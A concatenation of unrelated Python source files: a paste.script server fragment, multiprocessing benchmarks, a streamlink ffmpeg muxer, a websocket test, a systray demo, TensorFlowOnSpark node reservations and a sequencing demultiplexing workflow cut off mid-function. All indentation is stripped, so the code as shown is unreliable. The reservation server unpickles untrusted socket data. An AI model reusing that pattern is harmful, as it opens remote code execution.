print('Server running in PID %s' % pid)
return 0
def restart_with_reloader(self):
self.restart_with_monitor(reloader=True)
def restart_with_monitor(self, reloader=False):
if self.verbose > 0:
if reloader:
print('Starting subprocess with file monitor')
else:
print('Starting subprocess with monitor parent')
while 1:
args = [self.quote_first_command_arg(sys.executable)] + sys.argv
new_environ = os.environ.copy()
if reloader:
new_environ[self._reloader_environ_key] = 'true'
else:
new_environ[self._monitor_environ_key] = 'true'
proc = None
try:
try:
_turn_sigterm_into_systemexit()
proc = subprocess.Popen(args, env=new_environ)
exit_code = proc.wait()
proc = None
except KeyboardInterrupt:
print('^C caught in monitor process')
if self.verbose > 1:
raise
return 1
finally:
if proc is not None and hasattr(os, 'kill'):
try:
os.kill(proc.pid, signal.SIGTERM)
except (OSError, IOError):
pass
if reloader:
# Reloader always exits with code 3; but if we are
# a monitor, any exit code will restart
if exit_code != 3:
return exit_code
if self.verbose > 0:
print('-' * 20, 'Restarting', '-' * 20)
def change_user_group(self, user, group):
if not user and not group:
return
uid = gid = None
if group:
try:
gid = int(group)
group = grp.getgrgid(gid).gr_name
except ValueError:
try:
entry = grp.getgrnam(group)
except KeyError:
raise BadCommand(
"Bad group: %r; no such group exists" % group)
gid = entry.gr_gid
try:
uid = int(user)
user = pwd.getpwuid(uid).pw_name
except ValueError:
try:
entry = pwd.getpwnam(user)
except KeyError:
raise BadCommand(
"Bad username: %r; no such user exists" % user)
if not gid:
gid = entry.pw_gid
uid = entry.pw_uid
if self.verbose > 0:
print('Changing user to %s:%s (%s:%s)' % (
user, group or '(unknown)', uid, gid))
if hasattr(os, 'initgroups'):
os.initgroups(user, gid)
else:
os.setgroups([e.gr_gid for e in grp.getgrall()
if user in e.gr_mem] + [gid])
if gid:
os.setgid(gid)
if uid:
os.setuid(uid)
class LazyWriter(object):
"""
File-like object that opens a file lazily when it is first written
to.
"""
def __init__(self, filename, mode='w'):
self.filename = filename
self.fileobj = None
self.lock = threading.Lock()
self.mode = mode
def open(self):
if self.fileobj is None:
self.lock.acquire()
try:
if self.fileobj is None:
self.fileobj = open(self.filename, self.mode)
finally:
self.lock.release()
return self.fileobj
def write(self, text):
fileobj = self.open()
fileobj.write(text)
fileobj.flush()
def writelines(self, text):
fileobj = self.open()
fileobj.writelines(text)
fileobj.flush()
def flush(self):
self.open().flush()
def live_pidfile(pidfile):
"""(pidfile:str) -> int | None
Returns an int found in the named file, if there is one,
and if there is a running process with that process id.
Return None if no such process exists.
"""
pid = read_pidfile(pidfile)
if pid:
try:
os.kill(int(pid), 0)
return pid
except OSError as e:
if e.errno == errno.EPERM:
return pid
return None
def read_pidfile(filename):
if os.path.exists(filename):
try:
f = open(filename)
content = f.read()
f.close()
return int(content.strip())
except (ValueError, IOError):
return None
else:
return None
def _remove_pid_file(written_pid, filename, verbosity):
current_pid = os.getpid()
if written_pid != current_pid:
# A forked process must be exiting, not the process that
# wrote the PID file
return
if not os.path.exists(filename):
return
f = open(filename)
content = f.read().strip()
f.close()
try:
pid_in_file = int(content)
except ValueError:
pass
else:
if pid_in_file != current_pid:
print("PID file %s contains %s, not expected PID %s" % (
filename, pid_in_file, current_pid))
return
if verbosity > 0:
print("Removing PID file %s" % filename)
try:
os.unlink(filename)
return
except OSError as e:
# Record, but don't give traceback
print("Cannot remove PID file: %s" % e)
# well, at least lets not leave the invalid PID around...
try:
f = open(filename, 'w')
f.write('')
f.close()
except OSError as e:
print('Stale PID left in file: %s (%e)' % (filename, e))
else:
print('Stale PID removed')
def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
"""
This makes sure any open ports are closed.
Does this by connecting to them until they give connection
refused. Servers should call like::
import paste.script
ensure_port_cleanup([80, 443])
"""
atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries,
sleeptime=sleeptime)
def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
# Wait for the server to bind to the port.
for bound_address in bound_addresses:
for _i in range(maxtries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(bound_address)
except socket.error as e:
if e.errno != errno.ECONNREFUSED:
raise
break
else:
time.sleep(sleeptime)
else:
raise SystemExit('Timeout waiting for port.')
sock.close()
def _turn_sigterm_into_systemexit():
"""
Attempts to turn a SIGTERM exception into a SystemExit exception.
"""
def handle_term(signo, frame):
raise SystemExit
signal.signal(signal.SIGTERM, handle_term)
# ---- from paste.script.command --------------------------------------
python_version = sys.version.splitlines()[0].strip()
parser = optparse.OptionParser(add_help_option=False,
# version='%s from %s (python %s)'
# % (dist, dist.location, python_version),
usage='%prog [paster_options] COMMAND [command_options]')
parser.add_option(
'-h', '--help',
action='store_true',
dest='do_help',
help="Show this help message")
parser.disable_interspersed_args()
# @@: Add an option to run this in another Python interpreter
commands = {
'serve': ServeCommand
}
def run(args=None):
if (not args and len(sys.argv) >= 2 and os.environ.get('_') and
sys.argv[0] != os.environ['_'] and os.environ['_'] == sys.argv[1]):
# probably it's an exe execution
args = ['exe', os.environ['_']] + sys.argv[2:]
if args is None:
args = sys.argv[1:]
options, args = parser.parse_args(args)
options.base_parser = parser
if options.do_help:
args = ['help'] + args
if not args:
print('Usage: %s COMMAND' % sys.argv[0])
args = ['help']
command_name = args[0]
if command_name not in commands:
command = NotFoundCommand
else:
command = commands[command_name]
invoke(command, command_name, options, args[1:])
def invoke(command, command_name, options, args):
try:
runner = command(command_name)
exit_code = runner.run(args)
except BadCommand as e:
print(e)
exit_code = e.exit_code
sys.exit(exit_code)
|
mp_benchmarks.py
|
#
# Simple benchmarks for the multiprocessing package
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time
import multiprocessing
import threading
import queue
import gc
_timer = time.perf_counter
delta = 1
#### TEST_QUEUESPEED
def queuespeed_func(q, c, iterations):
a = '0' * 256
c.acquire()
c.notify()
c.release()
for i in range(iterations):
q.put(a)
q.put('STOP')
def test_queuespeed(Process, q, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = Process(target=queuespeed_func, args=(q, c, iterations))
c.acquire()
p.start()
c.wait()
c.release()
result = None
t = _timer()
while result != 'STOP':
result = q.get()
elapsed = _timer() - t
p.join()
print(iterations, 'objects passed through the queue in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_PIPESPEED
def pipe_func(c, cond, iterations):
a = '0' * 256
cond.acquire()
cond.notify()
cond.release()
for i in range(iterations):
c.send(a)
c.send('STOP')
def test_pipespeed():
c, d = multiprocessing.Pipe()
cond = multiprocessing.Condition()
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = multiprocessing.Process(target=pipe_func,
args=(d, cond, iterations))
cond.acquire()
p.start()
cond.wait()
cond.release()
result = None
t = _timer()
while result != 'STOP':
result = c.recv()
elapsed = _timer() - t
p.join()
print(iterations, 'objects passed through connection in',elapsed,'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_SEQSPEED
def test_seqspeed(seq):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
for i in range(iterations):
a = seq[5]
elapsed = _timer() - t
print(iterations, 'iterations in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_LOCK
def test_lockspeed(l):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
for i in range(iterations):
l.acquire()
l.release()
elapsed = _timer() - t
print(iterations, 'iterations in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_CONDITION
def conditionspeed_func(c, N):
c.acquire()
c.notify()
for i in range(N):
c.wait()
c.notify()
c.release()
def test_conditionspeed(Process, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
c.acquire()
p = Process(target=conditionspeed_func, args=(c, iterations))
p.start()
c.wait()
t = _timer()
for i in range(iterations):
c.notify()
c.wait()
elapsed = _timer() - t
c.release()
p.join()
print(iterations * 2, 'waits in', elapsed, 'seconds')
print('average number/sec:', iterations * 2 / elapsed)
####
def test():
manager = multiprocessing.Manager()
gc.disable()
print('\n\t######## testing Queue.Queue\n')
test_queuespeed(threading.Thread, queue.Queue(),
threading.Condition())
print('\n\t######## testing multiprocessing.Queue\n')
test_queuespeed(multiprocessing.Process, multiprocessing.Queue(),
multiprocessing.Condition())
print('\n\t######## testing Queue managed by server process\n')
test_queuespeed(multiprocessing.Process, manager.Queue(),
manager.Condition())
print('\n\t######## testing multiprocessing.Pipe\n')
test_pipespeed()
print()
print('\n\t######## testing list\n')
test_seqspeed(list(range(10)))
print('\n\t######## testing list managed by server process\n')
test_seqspeed(manager.list(list(range(10))))
print('\n\t######## testing Array("i", ..., lock=False)\n')
test_seqspeed(multiprocessing.Array('i', list(range(10)), lock=False))
print('\n\t######## testing Array("i", ..., lock=True)\n')
test_seqspeed(multiprocessing.Array('i', list(range(10)), lock=True))
print()
print('\n\t######## testing threading.Lock\n')
test_lockspeed(threading.Lock())
print('\n\t######## testing threading.RLock\n')
test_lockspeed(threading.RLock())
print('\n\t######## testing multiprocessing.Lock\n')
test_lockspeed(multiprocessing.Lock())
print('\n\t######## testing multiprocessing.RLock\n')
test_lockspeed(multiprocessing.RLock())
print('\n\t######## testing lock managed by server process\n')
test_lockspeed(manager.Lock())
print('\n\t######## testing rlock managed by server process\n')
test_lockspeed(manager.RLock())
print()
print('\n\t######## testing threading.Condition\n')
test_conditionspeed(threading.Thread, threading.Condition())
print('\n\t######## testing multiprocessing.Condition\n')
test_conditionspeed(multiprocessing.Process, multiprocessing.Condition())
print('\n\t######## testing condition managed by a server process\n')
test_conditionspeed(multiprocessing.Process, manager.Condition())
gc.enable()
if __name__ == '__main__':
multiprocessing.freeze_support()
test()
|
ffmpegmux.py
|
import os
import random
import threading
import subprocess
import sys
from streamlink.stream import Stream
from streamlink.stream.stream import StreamIO
from streamlink.utils import NamedPipe
from streamlink.compat import devnull, which
class MuxedStream(Stream):
__shortname__ = "muxed-stream"
def __init__(self, session, *substreams, **options):
super(MuxedStream, self).__init__(session)
self.substreams = substreams
self.options = options
def open(self):
fds = []
for substream in self.substreams:
fds.append(substream and substream.open())
return FFMPEGMuxer(self.session, *fds, **self.options).open()
@classmethod
def is_usable(cls, session):
return FFMPEGMuxer.is_usable(session)
class FFMPEGMuxer(StreamIO):
__commands__ = ['ffmpeg', 'ffmpeg.exe', 'avconv', 'avconv.exe']
@staticmethod
def copy_to_pipe(self, stream, pipe):
self.logger.debug("Starting copy to pipe: {}".format(pipe.path))
pipe.open("wb")
while not stream.closed:
try:
data = stream.read(8192)
if len(data):
pipe.write(data)
else:
break
except IOError:
self.logger.error("Pipe copy aborted: {}".format(pipe.path))
return
try:
pipe.close()
except IOError: # might fail closing, but that should be ok for the pipe
pass
self.logger.debug("Pipe copy complete: {}".format(pipe.path))
def __init__(self, session, *streams, **options):
if not self.is_usable(session):
raise StreamError("cannot use FFMPEG")
self.session = session
self.process = None
self.logger = session.logger.new_module("stream.mp4mux-ffmpeg")
self.streams = streams
self.pipes = [NamedPipe("foo-{}-{}".format(os.getpid(), random.randint(0, 1000))) for _ in self.streams]
self.pipe_threads = [threading.Thread(target=self.copy_to_pipe, args=(self, stream, np))
for stream, np in
zip(self.streams, self.pipes)]
ofmt = options.pop("format", "matroska")
outpath = options.pop("outpath", "pipe:1")
videocodec = session.options.get("ffmpeg-video-transcode") or options.pop("vcodec", "copy")
audiocodec = session.options.get("ffmpeg-audio-transcode") or options.pop("acodec", "copy")
metadata = options.pop("metadata", {})
self._cmd = [self.command(session), '-nostats', '-y']
for np in self.pipes:
self._cmd.extend(["-i", np.path])
self._cmd.extend(['-c:v', videocodec])
self._cmd.extend(['-c:a', audiocodec])
for stream, data in metadata.items():
for datum in data:
self._cmd.extend(["-metadata:{0}".format(stream), datum])
self._cmd.extend(['-f', ofmt, outpath])
self.logger.debug("ffmpeg command: {}".format(' '.join(self._cmd)))
self.close_errorlog = False
if session.options.get("ffmpeg-verbose"):
self.errorlog = sys.stderr
elif session.options.get("ffmpeg-verbose-path"):
self.errorlog = open(session.options.get("ffmpeg-verbose-path"), "w")
self.close_errorlog = True
else:
self.errorlog = devnull()
def open(self):
for t in self.pipe_threads:
t.daemon = True
t.start()
self.process = subprocess.Popen(self._cmd, stdout=subprocess.PIPE, stderr=self.errorlog)
return self
@classmethod
def is_usable(cls, session):
return cls.command(session) is not None
@classmethod
def command(cls, session):
command = []
if session.options.get("ffmpeg-ffmpeg"):
command.append(session.options.get("ffmpeg-ffmpeg"))
for cmd in command or cls.__commands__:
if which(cmd):
return cmd
def read(self, size=-1):
data = self.process.stdout.read(size)
return data
def close(self):
self.logger.debug("Closing ffmpeg thread")
if self.process:
# kill ffmpeg
self.process.kill()
self.process.stdout.close()
# close the streams
for stream in self.streams:
if hasattr(stream, "close"):
stream.close()
self.logger.debug("Closed all the substreams")
if self.close_errorlog:
self.errorlog.close()
self.errorlog = None
|
test_uws.py
|
#!/usr/bin/env python3
# vim: sts=4 sw=4 et
import http.client
import os
import pytest
import threading
import urllib.request
from tll import asynctll
from tll.channel import Context
class Test:
def setup(self):
self.ctx = Context()
self.ctx.load(os.path.join(os.environ.get("BUILD_DIR", "build"), "tll-uws"), 'channel_module')
self.loop = asynctll.Loop(context=self.ctx)
self.server = self.loop.Channel('ws://*:8080', name='server')
self.thread_event = self.loop.Channel("direct://", name='thread/tll', dump='text')
self.main_event = self.ctx.Channel("direct://", name='thread/main', master=self.thread_event)
self.channels = []
self.thread = None
self.thread_stop = threading.Event()
self.thread_error = None
self.thread_event.open()
self.main_event.open()
def teardown(self):
if self.thread:
self.thread_stop.set()
self.thread.join()
self.thread = None
self.thread_stop = None
self.thread_error = None
if self.loop:
self.loop.stop = 1
self.loop = None
for c in self.channels + [self.thread_event, self.main_event]:
c.close()
self.thread_event = None
self.main_event = None
self.channels = []
if self.server:
self.server.close()
self.server = None
self.ctx = None
def http(self, *a, **kw):
conn = http.client.HTTPConnection('::1', 8080, timeout=1)
conn.request(*a, **kw)
return conn.getresponse()
def test_http(self):
sub = self.loop.Channel("ws+http://path", master=self.server, name='server/http', dump='yes');
self.channels = [sub]
self.server.open()
def process(self, sub):
async def main():
m = await self.thread_event.recv()
assert m.data.tobytes() == b'open'
sub.open()
m = await sub.recv()
assert m.type == m.Type.Control
sub.post(b'hello', addr=m.addr)
m = await self.thread_event.recv()
assert m.data.tobytes() == b'done'
try:
self.loop.run(main())
except Exception as e:
self.thread_error = e
raise
self.thread = threading.Thread(target=process, args=(self, sub))
self.thread.start()
r = self.http('GET', '/')
assert r.status == 404
assert self.thread_error == None, self.thread_error
self.main_event.post(b'open')
r = self.http('GET', '/')
assert r.status == 404
assert self.thread_error == None, self.thread_error
r = self.http('GET', '/path')
assert r.status == 200
assert r.read() == b'hello'
assert self.thread_error == None, self.thread_error
self.main_event.post(b'done')
self.loop.stop = 1
self.thread.join()
assert self.thread_error == None, self.thread_error
|
force-appindicator.py
|
import pathlib, sys, time, threading
# Make the example find UltraSystray relative to itself
sys.path.append(str(pathlib.Path(__file__).parent.parent))
# Use default implementation for platform
#from UltraSystray import SystrayIcon
# Choose specific implementation
from UltraSystray.appindicator import SystrayIcon
icons = pathlib.Path(__file__).parent.parent / 'icons'
assert icons.exists()
icon_file = icons / 'arrow.png'
assert icon_file.exists()
def do_something(menu_item):
print("Doing something for 5 seconds...")
print("This will block the UI!")
time.sleep(5)
print("Done...")
def update_menu():
pass
def run_thread():
# In order for the icon to be displayed, you must provide an icon
tray = SystrayIcon(icon=icon_file, tooltip='Systray demo')
tray.menu_items=[
{ 'label': 'Quit', 'callback': tray.quit }
]
# Create system tray window and show it
tray.run()
thread = threading.Thread(target=run_thread)
thread.start()
print("Tray started")
print("Doing something else for 5 seconds")
time.sleep(5)
print("Done")
|
reservation.py
|
# Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""This module contains client/server methods to manage node reservations during TFCluster startup."""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import pickle
import select
import socket
import struct
import sys
import threading
import time
from . import util
logger = logging.getLogger(__name__)
TFOS_SERVER_PORT = "TFOS_SERVER_PORT"
TFOS_SERVER_HOST = "TFOS_SERVER_HOST"
BUFSIZE = 1024
MAX_RETRIES = 3
class Reservations:
"""Thread-safe store for node reservations.
Args:
:required: expected number of nodes in the cluster.
"""
def __init__(self, required):
self.required = required
self.lock = threading.RLock()
self.reservations = []
def add(self, meta):
"""Add a reservation.
Args:
:meta: a dictonary of metadata about a node
"""
with self.lock:
self.reservations.append(meta)
def done(self):
"""Returns True if the ``required`` number of reservations have been fulfilled."""
with self.lock:
return len(self.reservations) >= self.required
def get(self):
"""Get the list of current reservations."""
with self.lock:
return self.reservations
def remaining(self):
"""Get a count of remaining/unfulfilled reservations."""
with self.lock:
return self.required - len(self.reservations)
class MessageSocket(object):
"""Abstract class w/ length-prefixed socket send/receive functions."""
def receive(self, sock):
"""Receive a message on ``sock``."""
msg = None
data = b''
recv_done = False
recv_len = -1
while not recv_done:
buf = sock.recv(BUFSIZE)
if buf is None or len(buf) == 0:
raise Exception("socket closed")
if recv_len == -1:
recv_len = struct.unpack('>I', buf[:4])[0]
data += buf[4:]
recv_len -= len(data)
else:
data += buf
recv_len -= len(buf)
recv_done = (recv_len == 0)
msg = pickle.loads(data)
return msg
def send(self, sock, msg):
"""Send ``msg`` to destination ``sock``."""
data = pickle.dumps(msg)
buf = struct.pack('>I', len(data)) + data
sock.sendall(buf)
class Server(MessageSocket):
"""Simple socket server with length-prefixed pickle messages.
Args:
:count: expected number of nodes in the cluster.
"""
reservations = None #: List of reservations managed by this server.
done = False #: boolean indicating if server should be shutdown.
def __init__(self, count):
assert count > 0, "Expected number of reservations should be greater than zero"
self.reservations = Reservations(count)
def await_reservations(self, sc, status={}, timeout=600):
"""Block until all reservations are received."""
timespent = 0
while not self.reservations.done():
logger.info("waiting for {0} reservations".format(self.reservations.remaining()))
# check status flags for any errors
if 'error' in status:
sc.cancelAllJobs()
sc.stop()
sys.exit(1)
time.sleep(1)
timespent += 1
if (timespent > timeout):
raise Exception("timed out waiting for reservations to complete")
logger.info("all reservations completed")
return self.reservations.get()
def _handle_message(self, sock, msg):
logger.debug("received: {0}".format(msg))
msg_type = msg['type']
if msg_type == 'REG':
self.reservations.add(msg['data'])
MessageSocket.send(self, sock, 'OK')
elif msg_type == 'QUERY':
MessageSocket.send(self, sock, self.reservations.done())
elif msg_type == 'QINFO':
rinfo = self.reservations.get()
MessageSocket.send(self, sock, rinfo)
elif msg_type == 'STOP':
logger.info("setting server.done")
MessageSocket.send(self, sock, 'OK')
self.done = True
else:
MessageSocket.send(self, sock, 'ERR')
def start(self):
"""Start listener in a background thread
Returns:
address of the Server as a tuple of (host, port)
"""
server_sock = self.start_listening_socket()
# hostname may not be resolvable but IP address probably will be
host = self.get_server_ip()
port = server_sock.getsockname()[1]
addr = (host, port)
logger.info("listening for reservations at {0}".format(addr))
def _listen(self, sock):
CONNECTIONS = []
CONNECTIONS.append(sock)
while not self.done:
read_socks, write_socks, err_socks = select.select(CONNECTIONS, [], [], 60)
for sock in read_socks:
if sock == server_sock:
client_sock, client_addr = sock.accept()
CONNECTIONS.append(client_sock)
logger.debug("client connected from {0}".format(client_addr))
else:
try:
msg = self.receive(sock)
self._handle_message(sock, msg)
except Exception as e:
logger.debug(e)
sock.close()
CONNECTIONS.remove(sock)
server_sock.close()
t = threading.Thread(target=_listen, args=(self, server_sock))
t.daemon = True
t.start()
return addr
def get_server_ip(self):
return os.getenv(TFOS_SERVER_HOST) if os.getenv(TFOS_SERVER_HOST) else util.get_ip_address()
def start_listening_socket(self):
port_number = int(os.getenv(TFOS_SERVER_PORT)) if os.getenv(TFOS_SERVER_PORT) else 0
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_sock.bind(('', port_number))
server_sock.listen(10)
return server_sock
def stop(self):
"""Stop the Server's socket listener."""
self.done = True
class Client(MessageSocket):
"""Client to register and await node reservations.
Args:
:server_addr: a tuple of (host, port) pointing to the Server.
"""
sock = None #: socket to server TCP connection
server_addr = None #: address of server
def __init__(self, server_addr):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(server_addr)
self.server_addr = server_addr
logger.info("connected to server at {0}".format(server_addr))
def _request(self, msg_type, msg_data=None):
"""Helper function to wrap msg w/ msg_type."""
msg = {}
msg['type'] = msg_type
if msg_data:
msg['data'] = msg_data
done = False
tries = 0
while not done and tries < MAX_RETRIES:
try:
MessageSocket.send(self, self.sock, msg)
done = True
except socket.error as e:
tries += 1
if tries >= MAX_RETRIES:
raise
print("Socket error: {}".format(e))
self.sock.close()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(self.server_addr)
logger.debug("sent: {0}".format(msg))
resp = MessageSocket.receive(self, self.sock)
logger.debug("received: {0}".format(resp))
return resp
def close(self):
"""Close the client socket."""
self.sock.close()
def register(self, reservation):
"""Register ``reservation`` with server."""
resp = self._request('REG', reservation)
return resp
def get_reservations(self):
"""Get current list of reservations."""
cluster_info = self._request('QINFO')
return cluster_info
def await_reservations(self):
"""Poll until all reservations completed, then return cluster_info."""
done = False
while not done:
done = self._request('QUERY')
time.sleep(1)
return self.get_reservations()
def request_stop(self):
"""Request server stop."""
resp = self._request('STOP')
return resp
|
workflow.py
|
"""Implementation of the workflow for demultiplexing sequencing directories."""
import collections
import csv
import glob
import gzip
import itertools
import json
import logging
import os
import shutil
import subprocess
import sys
from threading import Thread, Lock
import tempfile
import xml.etree.ElementTree as ET
from snakemake.exceptions import WorkflowError
from digestiflow_demux import __version__
from .bases_mask import split_bases_mask, return_bases_mask, BaseMaskConfigException
from .api_client import ApiClient, ApiException
from .exceptions import ApiProblemException, MissingOutputFile
#: Path to the Snakefile.
PATH_SNAKEFILE = os.path.abspath(os.path.join(os.path.dirname(__file__), "Snakefile"))
#: Template for the success message.
TPL_MSG_SUCCESS = r"""
The demultiplexing succeeded for flow cell {flowcell[vendor_id]}.
See the attached files for quality reports.
The following attachments were not present (this is OK for HTML reports that are not generated
by Picard):
{missing_log_files}
--
This message was auto-created by digestiflow-demux v{version}.
"""
#: Template for the failure message.
TPL_MSG_FAILURE = r"""
The attempted demultiplexing for flow cell {flowcell[vendor_id]} has failed.
To try again, clean up any output files and mark as "ready" for demultiplexing again.
--
This message was auto-created by digestiflow-demux v{version}.
"""
def write_sample_sheet_v1(writer, flowcell, libraries):
"""Write V1 sample sheet"""
header = [
"FCID",
"Lane",
"SampleID",
"SampleRef",
"Index",
"Description",
"Control",
"Recipe",
"Operator",
"SampleProject",
]
writer.writerow(header)
demux_reads = flowcell.get("demux_reads") or flowcell["planned_reads"]
demux_reads = split_bases_mask(demux_reads)
lens = [count for base, count in demux_reads if base == "B"]
recipe = "PE_indexing" if demux_reads.count("T") > 1 else "SE_indexing"
for lib in libraries:
if lib["barcode2"]:
barcode = "".join((lib["barcode"][: lens[0]], "-", lib["barcode2"][: lens[1]]))
else:
barcode = lib["barcode"][: lens[0]]
for lane in sorted(lib["lanes"]):
data = [
flowcell["vendor_id"],
lane,
lib["name"],
lib["reference"],
barcode,
"",
"N",
recipe,
flowcell["operator"],
"Project",
]
writer.writerow(list(map(str, data)))
def write_sample_sheets_v2(flowcell, libraries, output_dir):
"""Write V2 sample sheets. Write one sample sheet for each bases_mask in the config."""
# re-shuffle dict from lib - lane - bases_mask to bases_mask - lib
d = collections.defaultdict(dict)
for key, lib in enumerate(libraries):
d[lib.get("demux_reads_override", flowcell["demux_reads"])][key] = lib
for bases_mask, libraries in d.items():
os.makedirs(
os.path.join(output_dir, "illumina_basesmask/{}".format(bases_mask)), exist_ok=True
)
with open(
os.path.join(output_dir, "illumina_basesmask/{}/SampleSheet.csv".format(bases_mask)),
"w",
) as f:
writer = csv.writer(f, delimiter=",")
write_sample_sheet_v2(writer, flowcell, libraries.values())
def write_sample_sheet_v2(writer, flowcell, libraries):
"""Write V2 sample sheet"""
# Write [Data] Section
writer.writerow(["[Data]"])
dual_indexing = any(library["barcode2"] for library in libraries)
if dual_indexing:
writer.writerow(["lane", "sample_id", "index", "index2", "sample_project"])
else:
writer.writerow(["lane", "sample_id", "index", "sample_project"])
rows = []
for lib in libraries:
for lane in sorted(lib["lanes"]):
barcodes = lib["barcode"].split(",")
for barcode in barcodes:
row = [lane, lib["name"], barcode]
if dual_indexing:
row.append(lib["barcode2"])
row.append("Project")
rows.append(row)
for row in sorted(rows):
writer.writerow(list(map(str, row)))
def write_sample_sheet_picard(flowcell, libraries, output_dir):
"""Write picard sample sheets, one per lane."""
dual_indexing = any(library["barcode2"] for library in libraries)
if not dual_indexing:
head_barcodes = ["barcode_sequence_1", "barcode_name", "library_name"]
head_samplesheet = ["OUTPUT_PREFIX", "BARCODE_1"]
else:
head_barcodes = ["barcode_sequence_1", "barcode_sequence_2", "barcode_name", "library_name"]
head_samplesheet = ["OUTPUT_PREFIX", "BARCODE_1", "BARCODE_2"]
# re-shuffle dict from lib - lane - barcode to lane - lib - barcode because picard works on lanes
d = collections.defaultdict(dict)
for lib in libraries:
for lane in sorted(lib["lanes"]):
d[lane][lib["name"]] = lib
# add Undetermined to samplesheet as picard crashes otherwise
for lane in d:
d[lane]["Undetermined"] = {"name": "Undetermined", "barcode": "N", "barcode2": ""}
if dual_indexing:
d[lane]["Undetermined"]["barcode2"] = "N"
for lane, libraries in d.items():
barcode_rows = []
samples_rows = []
for lib in libraries.values():
output_prefix = "{lane}/{name}".format(
name=lib["name"], flowcell=flowcell["vendor_id"], lane=lane
)
if dual_indexing:
# we do not pass the barcodes names, so we use the sample name.
barcode_row = [lib["barcode"], lib["barcode2"], lib["name"], lib["name"]]
samples_row = [output_prefix, lib["barcode"], lib["barcode2"]]
else:
barcode_row = [lib["barcode"], lib["name"], lib["name"]]
samples_row = [output_prefix, lib["barcode"]]
# barcode file should not contain dummy for unbarcoded reads, but samplesheet must.
if not lib["name"] == "Undetermined":
barcode_rows.append(barcode_row)
samples_rows.append(samples_row)
os.makedirs(os.path.join(output_dir, "picard_barcodes/{}".format(lane)), exist_ok=True)
with open(
os.path.join(output_dir, "picard_barcodes/{}/barcodes.txt".format(lane)), "w"
) as bf, open(
os.path.join(output_dir, "picard_barcodes/{}/samplesheet.txt".format(lane)), "w"
) as sf:
barcodewriter = csv.writer(bf, delimiter="\t")
sampleswriter = csv.writer(sf, delimiter="\t")
barcodewriter.writerow(head_barcodes)
sampleswriter.writerow(head_samplesheet)
for row in sorted(barcode_rows):
barcodewriter.writerow(list(map(str, row)))
for row in sorted(samples_rows):
sampleswriter.writerow(list(map(str, row)))
def reverse_complement(seq):
"""Return reverse-complemented version of ``seq``."""
mapping = {"A": "T", "a": "t", "C": "G", "c": "g", "G": "C", "g": "c", "T": "A", "t": "a"}
return "".join(reversed([mapping.get(i, i) for i in seq]))
def load_run_info(path_run_info_xml):
"""Load information from ``RunInfo.xml`` file."""
with open(path_run_info_xml, "rt") as xmlf:
xmls = xmlf.read()
root = ET.fromstring(xmls)
tag_run = root.find("Run")
return {
"run_id": tag_run.attrib["Id"],
"instrument": tag_run.find("Instrument").text,
"run_no": tag_run.attrib["Number"],
"flowcell": tag_run.find("Flowcell").text,
}
def load_run_parameters(path_run_parameters_xml):
"""Load information from ``runParameters.xml`` file."""
with open(path_run_parameters_xml, "rt") as xmlf:
xmls = xmlf.read()
root = ET.fromstring(xmls.lower())
version_string = next(root.iter("rtaversion")).text
if version_string.startswith("v"):
version_string = version_string[1:]
rta_version = tuple(map(int, version_string.split(".")))
return {"rta_version": rta_version}
def remove_old_samplesheets(output_dir):
"""Remove old sample sheets so that snakemake does not get confused."""
fls = ["SampleSheet.csv", "picard_barcodes", "illumina_basesmask"]
fls = [os.path.join(output_dir, f) for f in fls]
for f in fls:
if os.path.isdir(f):
shutil.rmtree(f)
elif os.path.exists(f):
os.remove(f)
def create_sample_sheet(config, input_dir, output_dir): # noqa: C901
"""Query the Digestiflow API for the necessary information for building the sample sheet."""
logging.info("Perform API queries and create sample sheet")
client = ApiClient(
api_url=config.api_url, api_token=config.api_token, project_uuid=config.project_uuid
)
logging.debug("Parsing RunInfo.xml file")
run_info = load_run_info(os.path.join(input_dir, "RunInfo.xml"))
path_run_info = glob.glob(os.path.join(input_dir, "?un?arameters.xml"))[0]
run_parameters = load_run_parameters(path_run_info)
logging.debug("RTA version is: %s", run_parameters["rta_version"])
logging.debug("Querying API for flow cell")
try:
flowcell = client.flowcell_resolve(
instrument_id=run_info["instrument"],
run_no=run_info["run_no"],
flowcell_id=run_info["flowcell"],
)
except ApiException as e:
raise ApiProblemException("Problem querying API for flow cell") from e
if flowcell is None:
logging.warning("Could not resolve flow cell via API. Not proceeding.")
return None
if flowcell["status_conversion"] != "ready" and not config.force_demultiplexing:
logging.warning('Status is not "ready", will skip flow cell.')
return None
if not flowcell["libraries"]:
logging.warning("There are no libraries in flow cell. I'm refusing to continue.")
return None
if not config.api_read_only:
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="in_progress")
except ApiException as e:
raise ApiProblemException('Could not update conversion status to "in_progress"') from e
logging.debug("Querying API for sequencing machine information")
try:
sequencer = client.sequencer_retrieve(sequencer=run_info["instrument"])
except ApiException as e:
raise ApiProblemException("Problem querying API for sequencer") from e
logging.debug("Querying for barcode information")
libraries = []
demux_reads_override = set()
for library in flowcell["libraries"]:
if not library["lane_numbers"]:
continue # do not consider library any further
if library.get("barcode_seq"):
barcode_seq = library.get("barcode_seq")
elif library.get("barcode"):
try:
